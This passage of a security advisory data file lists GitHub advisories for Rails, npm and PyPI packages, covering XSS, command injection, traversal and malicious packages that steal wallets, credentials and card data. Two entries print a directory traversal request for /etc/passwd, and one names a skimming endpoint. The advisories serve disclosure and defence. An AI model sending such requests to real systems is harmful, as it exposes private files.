'2020-08-31T18:12:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cfjv-5498-mph5,2023-05-04T19:48:00Z,2020-09-11T15:19:57Z,,['CVE-2020-15169'],XSS in Action View,"There is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks.
+
+### Impact
+
+When an HTML-unsafe string is passed as the default for a missing translation key [named `html` or ending in `_html`](https://guides.rubyonrails.org/i18n.html#using-safe-html-translations), the default string is incorrectly marked as HTML-safe and not escaped. Vulnerable code may look like the following examples:
+
+```erb
+<%# The welcome_html translation is not defined for the current locale: %>
+<%= t(""welcome_html"", default: untrusted_user_controlled_string) %>
+
+<%# Neither the title.html translation nor the missing.html translation is defined for the current locale: %>
+<%= t(""title.html"", default: [:""missing.html"", untrusted_user_controlled_string]) %>
+```
+
+### Patches
+
+Patched Rails versions, 6.0.3.3 and 5.2.4.4, are available from the normal locations.
+
+The patches have also been applied to the `master`, `6-0-stable`, and `5-2-stable` branches on GitHub. If you track any of these branches, you should update to the latest.
+
+To aid users who aren’t able to upgrade immediately, we’ve provided patches for the two supported release series. They are in git-am format and consist of a single changeset.
+
+* [5-2-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-5-2-translate-helper-xss-patch) — patch for the 5.2 release series
+* [6-0-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-6-0-translate-helper-xss-patch) — patch for the 6.0 release series
+
+Please note that only the 5.2 and 6.0 release series are currently supported. Users of earlier, unsupported releases are advised to update as soon as possible, as we cannot provide security fixes for unsupported releases.
+
+### Workarounds
+
+Impacted users who can’t upgrade to a patched Rails version can avoid this issue by manually escaping default translations with the `html_escape` helper (aliased as `h`):
+
+```erb
+<%= t(""welcome_html"", default: h(untrusted_user_controlled_string)) %>
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.3'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0.0'}, {'fixed': '6.0.3.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/rails/rails/security/advisories/GHSA-cfjv-5498-mph5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15169'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/e663f084460ea56c55c3dc76f78c7caeddeeb02e'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-15169.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/b-C9kSGXYrc'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/10/msg00015.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4766'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-11T15:19:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v6c5-hwqg-3x5q,2020-08-31T18:59:30Z,2020-09-04T17:23:03Z,,['CVE-2019-19723'],Improper Authorization in passport-cognito,"All versions of `passport-cognito` are vulnerable to Improper Authorization. The package fails to properly scope the variables containing authorization information, such as access token, refresh token and ID token. This causes a race condition where simultaneous authenticated users may receive authorization tokens for a different user. This would allow a user to take actions on another user's behalf.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'passport-cognito'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19723'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1443'}]","{'cwe_ids': ['CWE-285'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9r7h-6639-v5mw,2021-10-04T21:12:36Z,2020-09-03T15:54:00Z,,[],Cross-Site Scripting in bootstrap-select,"Versions of `bootstrap-select` prior to 1.13.6 are vulnerable to Cross-Site Scripting (XSS). The package does not escape `title` values on `` tags. This may allow attackers to execute arbitrary JavaScript in a victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 1.13.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bootstrap-select'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dimpu/ngx-md/issues/129'}, {'type': 'WEB', 'url': 'https://github.com/snapappointments/bootstrap-select/issues/2199'}, {'type': 'PACKAGE', 'url': 'https://github.com/snapappointments/bootstrap-select'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1522'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:02:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9v62-24cr-58cx,2021-09-28T16:08:17Z,2020-09-11T21:12:39Z,,[],Denial of Service in node-sass,"Affected versions of `node-sass` are vulnerable to Denial of Service (DoS). Crafted objects passed to the `renderSync` function may trigger C++ assertions in `CustomImporterBridge::get_importer_entry` and `CustomImporterBridge::post_process_return_value` that crash the Node process. This may allow attackers to crash the system's running Node process and lead to Denial of Service.
+
+
+## Recommendation
+
+Upgrade to version 4.13.1 or later","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-sass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '4.13.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sass/node-sass/commit/338fd7a14d3b8bd374a382336df16f9c6792b884'}, {'type': 'PACKAGE', 'url': 'https://github.com/sass/node-sass'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/961'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8wgc-jjvv-cv6v,2021-09-27T15:44:08Z,2020-09-02T15:54:52Z,,[],Improper Authorization in loopback,"Vulnerable versions of `loopback` may allow attackers to create Authentication Tokens on behalf of other users due to Improper Authorization. If the AccessToken model is publicly exposed, an attacker can create Authorization Tokens for any user as long as they know the target's `userId`. This will allow the attacker to access the user's data and their privileges.
+
+
+## Recommendation
+
+For loopback 2.x, upgrade to version 2.40.0 or later
+For loopback 3.x, upgrade to version 3.22.0 or later",[],"[{'package': {'ecosystem': 'npm', 'name': 'loopback'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.40.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.39.2'}}, {'package': {'ecosystem': 'npm', 'name': 'loopback'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.22.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.21.0'}}]","[{'type': 'PACKAGE', 'url': 'https://github.com/strongloop/loopback'}, {'type': 'WEB', 'url': 'https://loopback.io/doc/en/lb2/Security-advisory-08-08-2018.html]'}, {'type': 'WEB', 'url': 'https://loopback.io/doc/en/lb3/Security-advisory-08-08-2018.html]'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/771'}]","{'cwe_ids': ['CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:35:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2r4h-2ghh-5hpx,2023-09-11T20:32:52Z,2020-09-01T17:18:33Z,,['CVE-2017-16110'],Directory Traversal in weather.swlyons,"Affected versions of `weather.swlyons` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'weather.swlyons'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16110'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/weather.swlyons'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/379'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pjh3-jv7w-9jpr,2021-09-23T21:23:47Z,2020-09-01T15:18:55Z,,['CVE-2015-7982'],Command Injection in gm,"Versions of `gm` prior to 1.21.1 are affected by a command injection vulnerability. The vulnerability is triggered when user input is passed into `gm.compare()`, which fails to sanitize input correctly before calling the graphics magic binary.
+
+
+## Recommendation
+
+Update to version 1.21.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'gm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.20.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-7982'}, {'type': 'WEB', 'url': 'https://github.com/aheckmann/gm/commit/5f5c77490aa84ed313405c88905eb4566135be31'}, {'type': 'PACKAGE', 'url': 'https://github.com/aheckmann/gm'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/54'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:09:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gpg2-7r7j-4pm9,2021-09-29T21:05:05Z,2020-09-03T22:09:56Z,,[],Malicious Package in buffer-xob,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xob'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1249'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vmh4-322v-cfpc,2020-08-31T18:46:35Z,2020-09-03T18:18:06Z,,[],Cross-Site Scripting in cmmn-js-properties-panel,"Versions of `cmmn-js-properties-panel` prior to 0.8.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website.
+
+
+## Recommendation
+
+Upgrade to version 0.8.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'cmmn-js-properties-panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1080'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-frxq-v7fm-m4pv,2021-10-01T14:04:59Z,2020-09-02T20:27:53Z,,[],Malicious Package in requuest,"All versions of `requuest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requuest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/859'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w992-2gmj-9xxj,2021-09-28T17:02:50Z,2020-09-11T21:23:29Z,,[],Cross-Site Scripting in swagger-ui,"Versions of `swagger-ui` prior to 2.2.1 are vulnerable to Cross-Site Scripting (XSS). The package allows HTML code in the `swagger.apiInfo.description` value without proper sanitization, which may allow attackers to execute arbitrary JavaScript.
+
+
+## Recommendation
+
+Upgrade to version 2.2.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/830'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/988'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rxq3-5249-8hgg,2022-09-19T22:55:10Z,2020-09-09T17:29:41Z,,[],personnummer/python vulnerable to Improper Input Validation,"This vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.
+
+The vulnerability is determined to be low severity.
+
+### Impact
+
+This vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.
+
+### Patches
+
+The issue have been patched in all repositories. The following versions should be updated to as soon as possible:
+
+[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2
+D 3.0.1
+[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3
+Elixir 3.0.0
+[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1
+[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0
+[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0
+Kotlin 1.1.0
+Lua 3.0.1
+[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2
+Perl 3.0.0
+[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2
+[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1
+[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0
+Scala 3.0.1
+Swift 1.0.1
+
+If you are using any of the earlier packages, please update to latest.
+
+### Workarounds
+
+The issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be
+000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not
+000x.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)
+* Email us at [Personnummer Email](mailto:security@personnummer.dev)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'personnummer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/personnummer/python/security/advisories/GHSA-rxq3-5249-8hgg'}, {'type': 'PACKAGE', 'url': 'https://github.com/personnummer/python/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/personnummer/'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-04T16:32:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5854-jvxx-2cg9,2020-08-31T19:00:47Z,2020-09-03T15:46:57Z,,[],Denial of Service in subtext,"Versions of `subtext` >=4.1.0 are vulnerable to Denial of Service. The Content-Encoding HTTP header parser has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. Because hapi rethrows system errors (as opposed to catching expected application errors), the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+This package is deprecated and is now maintained as `@hapi/subtext`. Please update your dependencies to use `@hapi/subtext`. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1478'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m5ch-gx8g-rg73,2020-08-31T18:34:39Z,2020-09-02T15:43:53Z,,[],Remote Code Execution in pomelo-monitor,"All versions of `pomelo-monitor` are vulnerable to Remote Code Execution. Due to insufficient input validation an attacker could run arbitrary commands on the server thus rendering the package vulnerable to Remote Code Execution.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'pomelo-monitor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/756'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7wgh-5q4q-6wx5,2020-08-31T18:59:53Z,2020-09-04T17:30:39Z,,[],Malicious Package in 1337qq-js,"All versions of `1337qq-js` contain malicious code. The package exfiltrates sensitive information through install scripts. It targets UNIX systems. The information exfiltrated includes:
+- Environment variables
+- Running processes
+- /etc/hosts
+- uname -a
+- npmrc file
+
+
+## Recommendation
+
+Remove the package from your system and rotate any compromised credentials.",[],"[{'package': {'ecosystem': 'npm', 'name': '1337qq-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1455'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j8qr-rvcv-crhv,2020-08-31T18:40:50Z,2020-09-11T21:18:05Z,,[],Malicious Package in electron-native-notify,"All versions of `electron-native-notify` contain malicious code. The package was part of a targeted attack to steal cryptocurrency wallet seeds and upload them to a remote server, effectively giving attackers access to users wallets.
+
+
+## Recommendation
+
+Remove the package from your environment and [follow the recommendations by Komodo](https://komodoplatform.com/vulnerability-discovered-in-komodos-agama-wallet-this-is-what-you-need-to-do/)",[],"[{'package': {'ecosystem': 'npm', 'name': 'electron-native-notify'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm'}, {'type': 'WEB', 'url': 'https://komodoplatform.com/vulnerability-discovered-in-komodos-agama-wallet-this-is-what-you-need-to-do/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/927'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vp9c-fpxx-744v,2022-09-19T22:55:20Z,2020-09-23T17:19:55Z,,[],personnummer/ruby vulnerable to Improper Input Validation,"This vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.
+
+The vulnerability is determined to be low severity.
+
+### Impact
+
+This vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.
+
+### Patches
+
+The issue have been patched in all repositories. The following versions should be updated to as soon as possible:
+
+[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2
+D 3.0.1
+[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3
+Elixir 3.0.0
+[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1
+[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0
+[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0
+Kotlin 1.1.0
+Lua 3.0.1
+[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2
+Perl 3.0.0
+[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2
+[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1
+[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0
+Scala 3.0.1
+Swift 1.0.1
+
+If you are using any of the earlier packages, please update to latest.
+
+### Workarounds
+
+The issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be
+000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not
+000x.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)
+* Email us at [Personnummer Email](mailto:security@personnummer.dev)",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'personnummer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/personnummer/ruby/security/advisories/GHSA-vp9c-fpxx-744v'}, {'type': 'PACKAGE', 'url': 'https://github.com/personnummer/ruby/'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-23T17:19:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3cpj-mj3q-82wr,2021-10-01T20:49:46Z,2020-09-04T16:49:43Z,,[],Malicious Package in bs58chek,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bs58chek'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1376'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gcfc-mgg3-8j2c,2021-09-30T20:03:20Z,2020-09-03T18:11:29Z,,[],Malicious Package in sdfjghlkfjdshlkjdhsfg,"All versions of `sdfjghlkfjdshlkjdhsfg` contain malicious code. The package is essentially a worm that fetches all packages owned by the user, adds a script to self-replicate as a preinstall script and publishes a new version.
+
+
+## Recommendation
+
+Remove the package from your environment and ensure all packages owned were not impacted.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sdfjghlkfjdshlkjdhsfg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1072'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4627-w373-375v,2020-08-31T18:41:06Z,2020-09-11T21:22:24Z,,[],Malicious Package in grunt-radical,"Version 0.0.14 of `grunt-radical` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.",[],"[{'package': {'ecosystem': 'npm', 'name': 'grunt-radical'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.14'}, {'fixed': '0.0.13'}]}], 'versions': ['0.0.14']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/935'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rvg8-pwq2-xj7q,2021-09-24T20:34:56Z,2020-09-01T20:42:44Z,,[],Out-of-bounds Read in base64url,"Versions of `base64url` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below.
+
+
+## Recommendation
+
+Update to version 3.0.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'base64url'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/brianloveswords/base64url/pull/25'}, {'type': 'WEB', 'url': 'https://github.com/brianloveswords/base64url/commit/4fbd954a0a69e9d898de2146557cc6e893e79542'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/321687'}, {'type': 'PACKAGE', 'url': 'https://github.com/brianloveswords/base64url'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:31:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8px5-63x9-5c7p,2023-03-28T23:17:59Z,2020-09-03T16:47:30Z,,['CVE-2018-25083'],pullit vulnerable to command injection,"Versions of `pullit` prior to 1.4.0 are vulnerable to Command Injection. The package does not validate input on git branch names and concatenates it to an exec call, allowing attackers to run arbitrary commands in the system.
+
+## Recommendation
+
+Upgrade to version 1.4.0 or later.
+
+## Credits
+
+This vulnerability was discovered by @lirantal",[],"[{'package': {'ecosystem': 'npm', 'name': 'pullit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25083'}, {'type': 'WEB', 'url': 'https://github.com/jkup/pullit/issues/23'}, {'type': 'WEB', 'url': 'https://github.com/jkup/pullit/commit/4fec455774ee08f4dce0ef2ef934ffcc37219bfb'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/315773'}, {'type': 'PACKAGE', 'url': 'https://github.com/jkup/pullit'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/npm:pullit:20180214'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6fh5-8wq8-w3wr,2020-08-31T18:55:18Z,2020-09-04T15:09:55Z,,[],Prototype Pollution in unflatten,"All versions of `unflatten` are vulnerable to prototype pollution. The function `unflatten` does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'unflatten'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1329'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-whcm-29f4-j4mx,2023-09-07T00:10:56Z,2020-09-01T16:56:50Z,,['CVE-2017-16149'],Directory Traversal in zwserver,"Affected versions of `zwserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
